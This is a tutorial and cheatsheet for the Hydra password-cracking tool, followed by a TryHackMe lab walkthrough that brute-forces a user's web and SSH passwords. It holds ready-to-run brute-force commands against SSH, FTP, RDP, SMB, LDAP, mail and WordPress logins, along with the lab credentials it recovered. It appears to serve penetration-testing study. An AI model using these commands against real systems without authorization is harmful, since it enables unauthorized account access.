๐Hydra
https://www.kali.org/tools/hydra/
What is Hydra?
Hydra is a popular open-source password cracking tool that can be used to perform brute-force attacks on login credentials of various network protocols, including FTP, HTTP, SSH, Telnet, and others. It uses different attack methods, including dictionary attacks, brute-force attacks, and hybrid attacks, to guess passwords and gain unauthorized access to a system.
Hydra can be used to test the strength of passwords used in network systems and identify potential vulnerabilities that may be exploited by attackers. It is often used by security professionals, network administrators, and penetration testers as a tool to assess the security of their systems and identify weaknesses that need to be addressed.
According to its official repository, Hydra supports, i.e., has the ability to brute force the following protocols: โAsterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, Radmin, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, TeamSpeak (TS2), Telnet, VMware-Auth, VNC and XMPP.โ
Installing Hydra
If you prefer to use the Kali machine, Hydra also comes pre-installed, as is the case with all Kali distributions.
However, you can check its official repositories if you prefer to use another Linux distribution. For instance, you can install Hydra on an Ubuntu or Fedora system by executing apt install hydra
or dnf install hydra
. Furthermore, you can download it from its official THC-Hydra repository.
Cheatsheet
The following table uses the $ip variable which can be set with the following command:
export ip 10.10.10.2
hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt 10.2.26.221 ftp
Hydra FTP unknown user and psw (metasploit or rockyou user/password list)
hydra -P password-file.txt -v $ip snmp
Hydra brute force against SNMP
hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp
Hydra FTP known user and rockyou password list
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh
Hydra SSH using list of users and passwords
hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh
Hydra SSH using a known password and a username list
hydra $ip -s 22 ssh -l -P big_wordlist.txt
Hydra SSH Against Known username on port 22
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V
Hydra POP3 Brute Force
hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V
Hydra SMTP Brute Force
hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin
Hydra attack http get 401 login with a dictionary
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
Hydra attack Windows Remote Desktop with rockyou
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb
Hydra brute force SMB user with rockyou:
hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
Hydra brute force a Wordpress admin login
hydra -L usernames.txt -P passwords.txt $ip smb -V -f
SMB Brute Forcing
hydra -L users.txt -P passwords.txt $ip ldap2 -V -f
LDAP Brute Forcing
Example of usage
SSH
hydra -l <username> -P <full path to pass> 10.10.44.136 -t 4 ssh
-l
specifies the (SSH) username for login
-P
indicates a list of passwords
-t
sets the number of threads to spawn
For example, hydra -l root -P
/usr/share/wordlists/rockyou.txt 10.10.44.136 -t 4 ssh
will run with the following arguments:
Hydra will use
root
as the username forssh
It will try the passwords in the
rockyou.txt
fileThere will be four threads running in parallel as indicated by
-t 4
If you don't know user, you can use users wordlist using flag -L wordlist_name: -L usr/share/wordlists.rockyou.txt/usr/share/wordlists.rockyou.txt
Post Web Form
We can use Hydra to brute force web forms too. You must know which type of request it is making; GET or POST methods are commonly used. You can use your browserโs network tab (in developer tools) to see the request types or view the source code.
sudo hydra <username> <wordlist> 10.10.44.136 http-post-form "<path>:<login_credentials>:<invalid_response>"
-l
the username for (web form) login
-P
the password list to use
http-post-form
the type of the form is POST
<path>
the login page URL, for example, login.php
<login_credentials>
the username and password used to log in, for example, username=^USER^&password=^PASS^
<invalid_response>
part of the response when the login fails
-V
verbose output for every attempt
Below is a more concrete example Hydra command to brute force a POST login form:
hydra -l <username> -P <wordlist> 10.10.44.136 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
The login page is only
/
, i.e., the main IP address.The
username
is the form field where the username is enteredThe specified username(s) will replace
^USER^
The
password
is the form field where the password is enteredThe provided passwords will be replacing
^PASS^
Finally,
F=incorrect
is a string that appears in the server reply when the login fails
Room THM
Task 1 - Use Hydra to bruteforce molly's web password. What is flag 1?
Go to website: 10.10.226.238:80
and try to login with "default" credentials: admin:password.
We use Burp Suite and Foxy Proxy to intercept traffic and request:
After this, we turn off Foxy Proxy and retry to login with the same credentials:
The form and parameters to use with Hydra for Post-Web-Form are:
user (-l): molly
wordlist (-P): /usr/share/wordlists/rockyou.txt
IP: 10.10.226.238
method: http-post-form "/login:username=^USER^&password=^PASS^:
error message: Your username or password is incorrect."
molly:sunshine
We can login using them and finding flag1.
Task 2 - Use Hydra to bruteforce molly's SSH password. What is flag 2?
The form and parameters to use with Hydra for SSH are:
user (-l): molly
wordlist (-P): /usr/share/wordlists/rockyou.txt
IP: 10.10.226.238
port: ssh
molly:butterfly
We can login with ssh using them and finding flag2.
Other References
Last updated